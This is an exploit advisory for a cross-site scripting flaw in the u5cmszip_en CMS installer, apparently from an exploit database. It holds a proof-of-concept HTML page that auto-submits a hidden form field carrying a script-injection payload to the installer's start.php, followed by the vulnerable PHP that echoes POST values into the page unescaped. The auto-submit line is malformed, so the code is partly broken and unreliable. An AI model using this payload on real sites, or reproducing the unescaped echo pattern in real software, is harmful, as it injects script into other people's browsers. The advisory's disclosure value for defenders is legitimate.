|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|
|=============================================================|
|[+] Exploit Title: u5cmszip_en Cms Cross Site Scripting
|[+]
|[+] Exploit Author: Ashiyane Digital Security Team
|[+]
|[+] Vendor Homepage: http://yuba.ch/
|[+]
|[+] Download Link : http://yuba.ch/f.php?f=r/u5cmszip/u5cmszip_en.zip?t=1479045196
|[+]
|[+] Tested on: Kali Linux
|[+]
|[+] Date: 12 /27 / 2016
|=============================================================|
|[+] Exploit Code:
<html>
<head><title>Cross Site Scripting</title></head>
<body>
<form action="http://127.0.0.1/3/CMS/install/start.php" method="post" name="installation_step0">
<select name="language" class="language">
<option value="de">deutsch</option>
<option value="en" selected="selected">english</option>
<option value="es">spanish</option>
</select>
<input type="hidden" name="language" id="language" value="en'"()&%<acx><ScRiPt>alert(123)</ScRiPt>" />
</form>
<script language="Javascript">
setTimeout('http://127.0.0.1/3/CMS/install/start.php.submit()', 1);
</script>
</body>
</html>
============================================================
Vulnerable code :
<form action="step1.php" method="post" name="installation_step0">
<h4>Please choose a language | Bitte wählen Sie eine Sprache | Porfavor eligé una idioma:</h4>
<select name="language" class="language">
<?php
$countries = shortTag_countries();
foreach ($countries as $country => $iso) {
print "<option value="{$iso}"" . (strtolower($iso) == $http_lang? 'selected="selected"': '') . ">"
. htmlentities($country) . "</option>\n";
}
?>
</select>
<?php foreach ( $_POST as $key => $value ) { ?>
<?php if ( !strpos($key, 'password') ) { ?>
<input type="hidden" name="<?php echo $key ?>" id="<?php echo $key ?>" value="<?php echo $value ?>" />
<?php } } ?>
<input type="image" src="button_next.gif" alt="next" title="Next step" align="right" border="0" />
</form>
|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|
|[+] Discovered By : M.R.S.L.Y
|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|